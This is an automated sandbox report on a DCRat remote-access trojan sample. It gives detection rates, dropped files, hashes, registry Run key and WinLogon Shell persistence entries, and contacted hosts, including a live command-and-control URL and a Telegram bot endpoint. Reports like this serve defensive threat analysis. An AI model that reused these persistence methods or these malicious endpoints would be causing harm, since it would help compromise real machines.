Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
k1iZHyRK6K.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
k1iZHyRK6K.exe	65%	Virustotal		Browse
k1iZHyRK6K.exe	100%	Avira	HEUR/AGEN.1309961
k1iZHyRK6K.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\aMXlVeRh.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\Desktop\YlLkFAlS.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\YzuQZSWjCd.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\Desktop\QPVuBgDD.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\CdzqKGoc.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\JanKBv1Gj5.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\IAvfBIwS.log	100%	Avira	TR/AVI.Agent.updqb
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	100%	Avira	HEUR/AGEN.1309961
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\Desktop\KGHfuADJ.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\aMXlVeRh.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\eUUurwLd.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\WHyUeLIr.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\bnPvHrDf.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\QPVuBgDD.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\XgAKFRwS.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\KGHfuADJ.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\CdzqKGoc.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\EOeGRUzU.log	24%	ReversingLabs
C:\Users\user\Desktop\GZjfleQD.log	4%	ReversingLabs
C:\Users\user\Desktop\HeuFlNGE.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\IAvfBIwS.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\KGHfuADJ.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LcDwYjoO.log	24%	ReversingLabs
C:\Users\user\Desktop\QPVuBgDD.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\WHyUeLIr.log	8%	ReversingLabs
C:\Users\user\Desktop\XgAKFRwS.log	4%	ReversingLabs
C:\Users\user\Desktop\YSUUeens.log	4%	ReversingLabs
C:\Users\user\Desktop\YlLkFAlS.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\aMXlVeRh.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\bnPvHrDf.log	8%	ReversingLabs
C:\Users\user\Desktop\cbCbMxmL.log	24%	ReversingLabs
C:\Users\user\Desktop\eUUurwLd.log	8%	ReversingLabs
C:\Users\user\Desktop\fHYCcKHb.log	24%	ReversingLabs
C:\Users\user\Desktop\fzpjyagV.log	4%	ReversingLabs
C:\Users\user\Desktop\gvcKOXDZ.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\hKLkytLW.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\iLMKqBdM.log	4%	ReversingLabs
C:\Users\user\Desktop\iUeApcrA.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\pZlzyQSG.log	4%	ReversingLabs
C:\Users\user\Desktop\rpUzavtu.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\tzrAaNYu.log	4%	ReversingLabs
C:\Users\user\Desktop\xMRpRwBk.log	4%	ReversingLabs
C:\Users\user\Desktop\xqQPBCLW.log	8%	ReversingLabs
C:\Users\user\Desktop\zIEPhtYo.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
452132cm.n9shteam2.top	14%	Virustotal		Browse
ipinfo.io	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://ipinfo.io/country	0%	Virustotal		Browse
https://api.telegram.org/bot	4%	Virustotal		Browse
http://452132cm.n9shteam2.top/Processdownloads.php	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
452132cm.n9shteam2.top	37.44.238.250	true	true	14%, Virustotal, Browse	unknown
ipinfo.io	34.117.59.81	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/country	false	0%, Virustotal, Browse	unknown
http://452132cm.n9shteam2.top/Processdownloads.php	true	11%, Virustotal, Browse	unknown
https://ipinfo.io/ip	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io(	k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://452132cm.n9shteam2.top/	lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002D22000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://api.telegram.org/bot	k1iZHyRK6K.exe, 00000000.00000002.1704433455.00000000027E2000.00000002.00000001.01000000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.0000000002902000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.0000000002731000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.0000000002381000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.0000000002528000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.000000000253E000.00000004.00000800.00020000.00000000.sdmp, YSUUeens.log.30.dr, fzpjyagV.log.35.dr, GZjfleQD.log.0.dr, iLMKqBdM.log.47.dr	false	4%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	k1iZHyRK6K.exe, 00000000.00000002.1704577020.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 0000001E.00000002.1786856207.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 0000002F.00000002.2030593494.00000000027AC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://452132cm.n9shteam2.top	lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1817613827.0000000002D22000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://ipinfo.io	k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000003122000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ipinfo.io	k1iZHyRK6K.exe, 00000000.00000002.1704577020.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, k1iZHyRK6K.exe, 00000000.00000002.1704577020.0000000003106000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.117.59.81	ipinfo.io	United States		139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
37.44.238.250	452132cm.n9shteam2.top	France		49434	HARMONYHOSTING-ASFR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1547752
Start date and time:	2024-11-03 02:31:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	62
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	k1iZHyRK6K.exe renamed because original name is a hash value
Original Sample Name:	5780DBAE6AC61A88C8D89F216F324146.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@54/58@2/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 87% Number of executed functions: 306 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, consent.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target k1iZHyRK6K.exe, PID 2312 because it is empty
Execution Graph export aborted for target k1iZHyRK6K.exe, PID 4008 because it is empty
Execution Graph export aborted for target k1iZHyRK6K.exe, PID 7672 because it is empty
Execution Graph export aborted for target k1iZHyRK6K.exe, PID 8004 because it is empty
Execution Graph export aborted for target lMBSkpoWMYaHkUMNHfb.exe, PID 1368 because it is empty
Execution Graph export aborted for target lMBSkpoWMYaHkUMNHfb.exe, PID 6300 because it is empty
Execution Graph export aborted for target lMBSkpoWMYaHkUMNHfb.exe, PID 8032 because it is empty
Execution Graph export aborted for target lMBSkpoWMYaHkUMNHfb.exe, PID 8184 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:31:57	Task Scheduler	Run new task: k1iZHyRK6K path: "C:\Users\user\Desktop\k1iZHyRK6K.exe"
01:31:58	Task Scheduler	Run new task: k1iZHyRK6Kk path: "C:\Users\user\Desktop\k1iZHyRK6K.exe"
01:31:58	Task Scheduler	Run new task: lMBSkpoWMYaHkUMNHfb path: "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
01:31:58	Task Scheduler	Run new task: lMBSkpoWMYaHkUMNHfbl path: "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
01:32:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
01:32:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run k1iZHyRK6K "C:\Users\user\Desktop\k1iZHyRK6K.exe"
01:32:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
01:32:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run k1iZHyRK6K "C:\Users\user\Desktop\k1iZHyRK6K.exe"
01:32:33	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run lMBSkpoWMYaHkUMNHfb "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
01:32:41	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run k1iZHyRK6K "C:\Users\user\Desktop\k1iZHyRK6K.exe"
01:32:57	Autostart	Run: WinLogon Shell "C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe"
01:33:05	Autostart	Run: WinLogon Shell "C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe"
01:33:13	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\windows multimedia platform\lMBSkpoWMYaHkUMNHfb.exe"
01:33:22	Autostart	Run: WinLogon Shell "C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe"
01:33:30	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"
01:33:38	Autostart	Run: WinLogon Shell "C:\Users\user\Desktop\k1iZHyRK6K.exe"
21:31:59	API Interceptor	20x Sleep call for process: k1iZHyRK6K.exe modified
21:32:12	API Interceptor	1x Sleep call for process: lMBSkpoWMYaHkUMNHfb.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.117.59.81	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	VertusinstruccionesFedEX_66521.zip	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	UjbjOP.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	I9xuKI2p2B.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	licarisan_api.exe	Get hash	malicious	Icarus	Browse	ipinfo.io/ip
	build.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	YjcgpfVBcm.bat	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	lePDF.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	6Mpsoq1.php.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
37.44.238.250	FuWRu2Mg82.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	rollsroys.top/externaljsapisql.php
	QDJA9geR12.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	merlion.top/PythongameTrafficDatalifepublic.php
	Q9AQFOA6YC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	492668cm.newnyash.top/ToSecureLowProcessordefaultDatalifeCentral.php
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	024171cm.newnyash.top/authgameapiserverlinuxTestcdnDownloads.php
	bR9BxUAkJW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	nazvanie.top/ExternalVmPythonrequestsecurepacketBigloadlocalprivatetemporary.php
	Q13mrh42kO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	267991cm.n9shka.top/videoLowCpugameBigloadProtectuniversalCentralDownloads.php
	LbsPIL0buh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	890959cm.newnyash.top/imagepipejsHttpcpugametraffictestwordpress.php
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	vsratost.top/UpdateMultiasyncDownloads.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	Paiement.eml	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	34.117.59.81
	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	app64.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.59.81
	https://load.aberegg-immobilien.ch/	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	VertusinstruccionesFedEX_66521.zip	Get hash	malicious	Unknown	Browse	34.117.59.81
	kQyd2z80gD.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	sgc0e7HpH5.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	uHaQ34KPq5.exe	Get hash	malicious	Unknown	Browse	34.117.59.81

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HARMONYHOSTING-ASFR	FuWRu2Mg82.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	QDJA9geR12.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	Q9AQFOA6YC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	bR9BxUAkJW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	Q13mrh42kO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	LbsPIL0buh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	34.117.188.166

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Riskware.Application.15728.494.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	SecuriteInfo.com.Riskware.Application.15728.494.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://v90hdblg6c012.b-cdn.net/ppo45-fill-captch.html	Get hash	malicious	LummaC	Browse	34.117.59.81
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	34.117.59.81
	SecuriteInfo.com.Win32.RansomX-gen.15724.13250.exe	Get hash	malicious	MicroClip	Browse	34.117.59.81
	PQQmkT4xPT.exe	Get hash	malicious	Quasar	Browse	34.117.59.81
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	34.117.59.81
	hB5udQ0swC.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	Reservation Detail Booking.com ID.bat	Get hash	malicious	AsyncRAT	Browse	34.117.59.81
	SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exe	Get hash	malicious	Unknown	Browse	34.117.59.81

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\CdzqKGoc.log	teh76E2k50.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	8mmCiIv2Y1.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	FuWRu2Mg82.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	VfKk5EmvwW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	UwKpCJ6l4p.exe	Get hash	malicious	DCRat	Browse
	auXl1Tzyme.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	oLlotc8NO3.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	9D7RwuJrth.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Windows Multimedia Platform\e589e10572e94b

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with very long lines (516), with no line terminators
Category:	dropped
Size (bytes):	516
Entropy (8bit):	5.833055652434219
Encrypted:	false
SSDEEP:	12:Gx4lM6u1UBAYKnJMjdr7SCvGJ5H3NN3X4SEjCeiEcCn:GxP6kokJMjdrcl3fnXEjC5Cn
MD5:	410A264BCE718B30D1FA5360DA33CFC4
SHA1:	A14D444CECA5A44752319CDA714823BF5AD6C91B
SHA-256:	D3025957600D4A0F4732A5EAC72B034C3A2C841999D97C3DA9F4E3A9B7AB3507
SHA-512:	0B299436F61089C6EA830C7970103F5F5EBF233637AC145B5C112F4EE9963E7B416E428981710BFFF793B6A0CA21E599C184E25A2CFCF9BD6635A5E6777EF628
Malicious:	false
Preview:	zm3kn1BOuGMa1VDyLD18WA2CX2YaTxea9ZHCmlIniMkAVIfGDVF14rIyt1Nvck56lvacNAMj4OZKa1rPWRX8sngSQTSuXXL7RnYkrD3CJf6qR8Y1K7YKN6O8OIL4rbMgDb2wdGiSYUzNq0AR4akZ8AuUZaVi29VrSamzGlYDZGw3HARYH39R0wiCrhWCv9aY9H4QNLLSCh92N0NZI6b8AD1g1jHiPVRapY39FBK6rqPTwpy0T73yibY5QXYnDmDqPjMz6NTHveQUyhuMuQPScd2NA8tsnh3FmjDNd94GnwCDLDGsnM2wXvOwq9z8eleOlLrPehtvWIopazC61AFaoGr1VRgdJ5lCSyb9W0OFdHZOGiV173GdgDkedz4MAPmagmXmXCjAv97hqcvw6pgPzIgON7fh6CFNe8rdLsd4UFrgFDxBEIQVsXlYGIYahCEt4tCsvRlNLm4ta9JKJecyvteGXSXCTDXSA8mVAFQwgDJGc18G8ORCjQ8KO5Uc3j3IPmsc

C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	875520
Entropy (8bit):	5.423523110623198
Encrypted:	false
SSDEEP:	12288:I/TnPz84JfpflKH6qHJJMA+7pW3Ari4VVyZC0+1cp9rcDNpTWDTQGCZ6:I/TnzfS6qpJMA+73iE0nTr66
MD5:	5780DBAE6AC61A88C8D89F216F324146
SHA1:	CEBCEBEDC7AAEA3A4DD1FBEC933CD169BF92E9DC
SHA-256:	4B1967B04039C9B7A23651043B38C895CCA2EB560DE30A960368F82549079605
SHA-512:	8A595384247649E31EF0C69A63243199D224334D75B66FD486A8E6BA0AC3C2B5521E1EAD4B64FB9C968C21A4836581DDE10E78F36217B62862C40BED2D105920
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..g.................T...........r... ........@.. ....................................@.................................xr..S....... ............................................................................ ............... ..H............text....R... ...T.................. ..`.rsrc... ............V..............@..@.reloc...............Z..............@..B.................r......H.......X... .......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\Windows Portable Devices\e589e10572e94b

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	216
Entropy (8bit):	5.684169452233323
Encrypted:	false
SSDEEP:	3:iz3nfjQUWIqAJdSAWFMwSbzTHjqiarNmAyCZHVpd8d1QD7ist5WlG3BSA8V/5EGv:ijlqUQzFMRzTHjEreQHhdWlG30ABU1oY
MD5:	2769BA88C86A3CBD7361973EE8199726
SHA1:	4E7CC0463AB5DD7DDA8E5381A5CDA20764B0104E
SHA-256:	761DE0553717307B492650A57AA62F8A6FCFB911DE299FDF0201D1D25E7FC536
